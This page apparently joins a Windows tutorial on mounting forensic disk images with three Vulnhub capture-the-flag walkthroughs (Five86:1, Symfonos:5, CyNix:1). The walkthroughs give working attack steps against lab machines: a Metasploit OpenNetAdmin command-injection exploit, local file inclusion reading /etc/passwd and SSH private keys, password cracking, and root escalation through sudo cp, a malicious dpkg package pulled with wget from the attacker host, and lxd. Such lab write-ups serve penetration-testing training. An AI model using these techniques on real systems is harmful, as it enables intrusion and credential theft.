Multiple Ways to Mount Raw Images (Windows)

In this article, we are going to learn how we can mount a forensic image in Windows Machine. There are multiple ways to accomplish this and tools like OSF Mount, Arsenal etc. will help us in this process. So, Let's Start.

Table of Content

·         Introduction

·         Why Mount an Image?

·         Mounting Tools

o   Mount Image Pro

o   OSF Mount

o   Arsenal Image Mounter

o   Access Data FTK Imager

Introduction

In the Cyber Forensic world, a forensic image is complete sector by sector copy of a hard drive or external drive. Generally, a forensic image is used as evidence in forensic investigation. These images include unlocated space, slack space and boot records. Some computer forensic tool use different  formats to generate forensic image.

Some common forensic images formats are RAW, E01, AFF, etc. We can use a variety of tools to analyze and mount that image to get better investigative results.

Why Mount an Image?

Mounting is the process that converts a RAW logical image into a mounted directory. To better examine a forensic image mounting is preferred. There are various tools that can be used to mount a RAW image. Let’s Learn the process of mounting using these variety of tools. Although the basic procedure is same but there are times where an investigator finds himself in a situation where he/she cannot use their preffred tool. Also Each investigative company uses different tools. So a good investigator should know all the different types tools to widen their abilty and robustness.

Tool #1: Mount Image Pro

Mount Image Pro is a tool, which is quite useful in Forensic investigations. It enables the mounting image across all the forensic image extensions. Some of them are:

·         .RAW

·         .E01 (Encase Image)

·         .A01

·         .dd

This tool is developed by GetData. They are Renowned Provider of User-End software. That provides Data Recovery, File Recovery, Computer Forensics and File Previewing. Their products are designed for getting data back from systems and their hard drives.

We can download the mount image pro from here.

Once downloaded the mount image pro, then launch tool using the Icon created on the Desktop. After launching the app, we need to press the Mount icon to get started.

We can also click on the File from the Drop down menu. Go for the “Mount Image File” Option to move ahead.

After this, we need to select our digital image file on our hard drive. After selecting the image file, we need to click on the “Open” button to open the image file.

Now, we need to select a bunch of options to get started. First one is How we want to mount our image? We want the image to be mounted and shown as a partition in our Explorer. Hence we choose the Disk Option. If you want to investigate the image as a Directory choose File System. Followed by this is the Location where we want to mount. If we choose the File System Option, we need to specfy the Destination Directory. Here we can Choose a Alphabet which would act as Drive Letter (such as Local Disk D: or E: etc.). Next we get to Disk options panel here, we checked plug and play so that the dismount is easier. Now we select the kind of access that we want to get. We choose the Read Only Access. We can also customize the Sector Size of the Partition. After giving all the required details press OK button.

After this, mounting will starts and we get a live progression of the process through the status bar as depicted below.

After completion, we will get our mounted image and we can start our investigation.

As the screenshot suggests it mounted our forensic image as F drive. Now, we can analyze it and get the same view from the files as its user gets in its system.

OSF Mount

OSF Mount is the software that allows us to mount local disk image files (sector by sector copies off an entire disk or disk partition) in windows system.  We can then analyze the disk with its other tool which is OS Forensics. By default, the image files are mounted as read-only so that our original image files do not get altered.

This software supports mounting disk images files in any mode, whether we want them in the read-only mode, write mode in write cache mode.

We can download OSF mount from here.

Let’s Begin with opening the OSF mount after completing its installation process. The developers at PassMark gave us a neat UI to work upon. We have the very minimilastic interface here. To begin with we will hit the “Mount New” Button.

After that, we follow a series of steps where we fill in the required details.

Step #1: We need to provide the source of the image file to mount for our investigation.

After filling in details, we hit the Next button.

Step #2: We need to select if we want a specific partition or we want the entire image mounted for investigation.

After that step, we need to finalize things. In the last step we need to select few details regarding our image. These are some additional features that we want to include in our process or not. These features include if we want to mount our image as a removable media or not, the Drive type, the Drive letter, Drive emulations, etc.

After filling all details and completing all steps click on the mount button to start mounting the image file.

Now as shown in the image given below we have the image successfully mounted and ready for the analysis.

We can also check the working of the mounted image file by opening the mounted image in the File Explorer as shown in the image given below:

Arsenal Image Mounter

Arsenal image mounter handles the disk images as whole drive. As far as Windows system are concerned, the contents of disk images mounted by AIM are real SCSI disk, which allows its users to take advantage from some disk specific features like Integration with Disk Manager and Access to volume shadow copies and much more.

Many of the image mounting solutions in the market contents of disk images as share and partition rather than complete disk. Which some times limits their usefulness to digital forensics practitioners or investigators. If AIM is running without a license, it will run in free mode and provide core functionalities. If it is licensed, it will run in professional mode with full functionalities enabled.

We can download our Arsenal Image Mounter from here.

After downloading and completing its installation process, We can open this software and start mounting an image file. After opening that software click on the “Mount disk image” button.

Now we have some details to fill in. We are asked about the mode in which we want to see our mounted image or what type of device it has to be. We can choose Read Only or Writable among other options. We are also required to fill in the Sector Size and Click on the Create “removable” disk device for a better mounting process. After filling up all the details click on the OK button to move further.

After this our disk is mounted successfully, we will get all the details regarding that with that mounted message.

Now we check if our image is successfully mounted as a removable device in our system. After checking that, now we can finally start our investigation process.

Access Data FTK Imager

Access Data belives that zero is on relevant evidence quickly, conduct faster searches and dramatically increase analysis speed with FTK. FTK uses distributed processing and it is a solution to fully leverage multi-core and multi-thread computers. While other tools waste the usage of modern hardware solutions. Where FTK try to use 100 percent of its hardware resources for trying to help in the investigation process.

FTK provides faster searching in comparison to other solutions. FTK is truly database-driven, all data is stored securely and centrally, which allows our teams to use the same database that reduces cost creating multiple data sets.

We can download our access data FTK Imager from here.

After finishing up the Installation process, Open the software to move further ahead.

Now, click on the File option from Menu and Select the “Image Mounting” option to start the image mounting process.

Now we explore Add Image file option. We browse the image file in the system, then fill up the details like image file mount type, its drive letter, and its mount method.

After filling up all mandatory details regarding the process, click on the Mount button to start the mounting process.  

It takes some time to mount an image, but after finishing up the process we will get the details of our mounted image which comes in the mapped images section. It provide us some basic information regarding Drive, Method, Partition, Image locations, etc.

If we want we check the intergrity information we can do so by checking or monitoring this drive physically by reaching this drive location to validate that data information and start our investigation.

These are different ways in which we can mount a forensic image windows to help investigators. For better analysis of the evidence it will help them in their investigation process.

Author: Shubham Sharma is a Pentester, Cybersecurity Researcher and Enthusiast, contact here.

Five86:1 Vulnhub Walkthrough

Today we are sharing another CTF walkthrough of the vulnhub machine named Five86-2 with the intent of gaining experience in the world of penetration testing. The credit goes to m0tl3ycr3w and syed umar for design this machine and the level is set to beginner to advanced.

According to author: The ultimate goal of this challenge is to get root and to read the one and only flag.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

Download it from here: https://www.vulnhub.com/entry/five86-1,417/

Penetration Testing Methodologies

Network scaning

·        Netdiscover

·        Nmap

Enuemration

·        Exploring Http services

Exploit OpenNetAdmin

·        Command Injection (Metasploit)

·        Crack the hashes (john)

Privilege Escalation

·        Abousing Sudo

·        Abusing SUID

Walkthrough

Network Scanning

As you know, this is the initial phase where we choose netdiscover for network scan for identifying host IP and this we have 192.168.0.126 as our host IP.

In our next step, we love to use nmap for network ports enumeration, thus we run the following command and found port 80 is open for HTTP, moreover we also found robots.txt displaying disallow entry for /ona as shown in the below image.

Enumeration

Thus, we navigate to web browser and browse the following URL and found open network admin application is running on the web server and disclosing application installed version.

http://192.168.0.126/ona

As we notice that the openNetAdmin 18.1.1 version is installed on the host machine, so we explored for its exploit and found ruby script for Metasploit available to Exploit DB to abuse OpenNetAdmin against command injection. Without wasting time, we download a malicious file from our local machine.

Further we copied the download ruby inside the Metasploit framework to use the module for exploit the host machine against its vulnerability.

Exploit

After coping the exploit inside Metasploit Framework, you will need to reload the database and load the module.

Here we got our meterpreter session after running following commands:

use exploit 47772

set rhosts 192.168.0.126

set lhost 192.168.0.132

exploit

So, we successfully exploited the host machine and spawned the shell as www-data, we decided to go with post enumeration for privilege escalation and as a result, we found the “.htaccess” file from within /var/www/html/reports. By reading the .htaccess we found path for .htpasswd file i.e. “/var/www/.htpasswd” , and by reading .htapasswd file we found hashes for user “douglas”. In the .htapsswd file, author has left a hint for the password as shown in the image.

So, we found that the password is a 10-character "aefhrt" string, so you'll need to prepare a 10-character long password dictionary. Here we use crunch to create the dictionary and execute the following command to follow the pattern of the password as the author has said.

crunch 10 10 aefhrt > dict.txt

With the help of the above command, we generated a dictionary and used the john ripper to crack the hash value. Here I saved the hash value described above in a text file called "hash" and used dict.txt wordlist to crack the hash value and run the following command.

john –wordlist=/root/dict.txt hash

As result we found password: “fatherrrr” for the given hash value.

Privilege Escalation

As we spawned the host machine shell, we try to switch as duglas by using the password cracked above. When we signed in as duglass, we searched for the sudo rights for him and found that he could use the copy program as "jen."

Since author has given sudo right on copy program which could be executed as jen hence we can copy the ssh public rsa_key of douglas inside /home/jen/.ssh so that we can logged as jen. Thus, we executed the following commands as given below.

cat id_rsa.pub > /tmp/authorized_keys

cd /tmp

chmod 777 authorized_keys

sudo -u jen /bin/cp authorized_keys /home/jen/.ssh

Now copy id_rsa in the /tmp directory and change the permission then try to access ssh shell on localhost as jen.

cd .ssh

cp id_rsa /tmp

cd /tmp

chmod 600 id_rsa

ssh -i id_rsa jen@127.0.0.1

Hmmm! As we connected to the ssh shell as jen we found another hint “you have a new mail” on the ssh banner as shown in the given image.

So, we find a text file "jen" in / var / mails that shows a jen email. As per this message jen knows the password for the Moss account, so we can use the Moss credential for a further move.

So, switched from jen's account to Moss and identified for SUID enabled directories, luckily here we found that the sticky bit is enabled for "upyourgame" as shown in the image.

find / -perm -u=s -type f 2>/dev/null

cd .game

./upyourgame 

So we navigate to /home/Moss/.game/ and run the "upyourgame" program, the program launches questionnaires that are only answerable in the YES / NO format, and finally we get the root shell and find the final flag in the /root directory as shown below.

Symfonos:5 Vulnhub Walkthrough

This is another post on vulnhub CTF “named as “symfonos” by Zayotic. It is designed for VMware platform, and it is a boot to root challenge where you have to find flags to finish the task assigned by the author.

You can download it from here: https://www.vulnhub.com/entry/symfonos-5,415/

Level: Intermediate

Penetrating Methodologies

Scanning

·        Netdiscover

·        Nmap

Enumeration

·        Abousing HTTP

·        Dirb

Exploiting LFI

·        Brupsuite

Privilege Escalation

·        Exploiting Dpkg

Walkthrough

Scanning

Let’s start off with the scanning process. This target VM took the IP address of 192.168.0.112 automatically from our local wifi network.

Then we used Nmap for port enumeration. We found that port 22 for SSH, 80 for HTTP,389 and 636 for ldap are open.

nmap -p- -A 192.168.0.112

Enumeration

As port 80 is open, we tried to open the IP address in our browser, but we didn’t find anything useful on the webpage.

Further we use dirb for directory brute-forcing and found /admin.php page with status code 200 OK on executing following command.

dirb http://192.168.0.112

When we searched the above listed web page, i.e./admin.php; we got a login page, but we don't know the login credential, so we try to bypass the login page by using sql injection and brute force attack, but unfortunately nothing was achieved.

Therefore, further we use brutesuite and intercept the browser request of the current webpage for analyzing its request. We sent the request to the repeater and gently found a suspicious hyperlink inside its burp response.

We feel here is possibilities of LFI just because the url is connecting with localhost for portraits.php file as shown in the given image.

To ensure the possibility of LFI vulnerability we try to pull “/etc/passwd” file by fuzzing the parameter “/home.php?url=” and it works successfully as expected to be.

Exploit LFI

As result we successfully got the content of “admin.php” file by exploit LFI by fuzzing same parameter. As we knew the http://192.168.0.112/admin.php webpage requires login credential and here we found credential “username:admin” and “password: qMDdyZh3cT6eeAWD” which is actually used to connect with ldap.

Further we used namp for ldap enumeration and run following command, and as result we found user information including password.

nmap 192.168.0.112 -p 389 --script ldap-search --script-args 'ldap.username="cn=admin,dc=symfonos,dc=local", ldap.password="qMDdyZh3cT6eeAWD"'

zeus

cetkKf4wCuHC9FET

Privilege Escalation

Thus, we used the user zeus credential as enumerated above to access the ssh shell of the host machine and check sudo rights for him. We found zeus has sudo permission to run dpkg as root thus we abuse zeus sudo rights for privilege escalation by exploit dpkg functionality.

As we Dpkg is package installer just like apt in Linux like operating system and so here we are going to craft a Debian package with the help fpm transfer on the host machine to get the privilege shell.

mkdir ignite

cd ignite

nano shell.sh

write following code in the shell.sh file and save it.

 #!/bin/bash

/bin/bash

Install fpm in your local machine and run following command to generate a Debian package for shell.sh file.

fpm -s dir -t deb -n exploit –before-install shell.sh ./

ls

python -m SimpleHTTPServer

Note: You will need to install FPM on your machine.

Once the malicious deb package gets generated download it on the host machine and install the package as root. To perform privilege escalation run the following command and you get privilege where you found the proof.txt as shown in the given image.

wget http://192.168.0.114:8000/exploit_1.0_amd64.deb

sudo -u root /usr/bin/dpkg -i exploit_1.0_amd64.deb

id

cd /root

cat proof.txt

Reference : https://gtfobins.github.io/gtfobins/

CyNix:1 Vulnhub Walkthrough

Today we are sharing another CTF Walkthrough named Cynix Post by Vulnerhub and credit goes to “Sumit Verma” and  the level difficulty is set Intermediate-Hard. You have to hunt two flags, and this is a boot to root challenge. Download it from here.

Table of Content

Network scaning

·         Netdiscover

·         Nmap

Enumeration

·         Abousing HTTP

·         Dirbuster

Exploiting LFI

·         Brupsuite

·         Privilege Esclation

Lxd

Walkthrough

Network Scanning

As you know, this is intial phase where we choose netdiscover for ntwork scan for identify host IP and this we have 192.168.1.105 as our host IP.

In our next step we love to use nmap for network ports enumeration, thus we run following command and found port 80 is open for HTTP and 6688 is open for SSH and also the host operating system is Linux based OS.

nmap -p- -A 192.168.1.105

Enumeration

After network scanning, enumeration is next phase, because  it helps a pentester for to dig out suspicious information or loopholes in the installed application, therefore we navigate to web browser and explored the host IP as shown  but unfortunately we found nothing except apache default page.

We continue this with the directory brute force attack and the dirbuster used for directory listing. As you can see, we've found a directory named /lavalamp to learn more about dirbuster, read the article from here.

We're browsing the /lavalamp in the web browser and we're welcomed by the web page shown in the image. Then we dig more and more, including its source code, but found no hint for the next step.

As a result, we fill out the contact form as shown in the image below and intercept the http request of the browser in the browser.

The intercepted request shows that, here the HTTP Post method is used to submit the request at /canyobypassme.php page.

Thus, we navigate to /lavalamp/canyoubypassme.php as found above, an image on the web page shown below.

As the web page displays the image only and it was troubling us, thus, we check its source code and notice a hidden form with opacity 0:0 inside the web page.

With the help inspect element we changed the opacity 0:0 to 0:1 and got the form visible on the web page.

Now it was time to intercept the form's http request by entering a value as a specific number. So, we've got the intercepted request in the burpsuite where we've seen the parameter "file=1" and maybe there's a possibility for LFI, so we've sent the request to the repeater.

For validating LFI we looked for /etc/passwd file by injecting “../../../etc/passwd” in the parameter “file=1” as checked its response.

Luckily, we found the application is vulnerable to LFI and from its result we notice record entry for username “ford” and “lxd”

Exploiting LFI

Since ssh is installed on the host machine, so we also check for ssh rsa key by injecting “../../../home/ford/.ssh/id_rsa” in parameter ‘’file=8” as result we found id_rsa key for ssh.

We copied the id_rsa key in a text document and named it “key” and also grant permission 600, and finally get logged in and spawn the ssh shell of the machine.

chmod 600 key

ssh -i key ford@192.168.1.105

we found our fist flag user.txt file inside ford’s /home directory and for privilege escalation we check user_id where we saw ford is member of lxd group thus we can escalated go with lxd privilege escalation which we had explained in our previous article.

Privilege Escalation

In order to take escalate the root privilege of the host machine you have to create an image for lxd thus you need to perform the following the action:

1.       Steps to be performed on the attacker machine:

§  Download build-alpine in your local machine through the git repository.

§  Execute the script “build -alpine” that will build the latest Alpine image as a compressed file, this step must be executed by the root user.

§  Transfer the tar file to the host machine

2.       Steps to be performed on the host machine:

§  Download the alpine image

§  Import image for lxd

§  Initialize the image inside a new container.

§  Mount the container inside the /root directory

So, we downloaded the build alpine using the GitHub repose.

git clone  https://github.com/saghul/lxd-alpine-builder.git

cd lxd-alpine-builder

./build-alpine

On running the above command, a tar.gz file is created in the working directory that we have transferred to the host machine.

python -m SimpleHTTPServer

On another hand we will download the alpine-image inside /tmp directory on the host machine.

cd /tmp

wget http://192.168.1.107:8000/apline-v3.10-x86_64-20191008_1227.tar.gz

After the image is built it can be added as an image to LXD as follows:

lxc image import ./apline-v3.10-x86_64-20191008_1227.tar.gz --alias myimage

Use the list command to check the list of images

lxc image list

lxc init myimage ignite -c security.privileged=true

lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true

lxc start ignite

lxc exec ignite /bin/sh

id

Once inside the container, navigate to /mnt/root to see all resources from the host machine.

After running the bash file. We see that we have a different shell, it is the shell of the container. This container has all the files of the host machine. So, we enumerated for the root flag and found it.

mnt/root/root

ls

flag.txt

cat flag.txt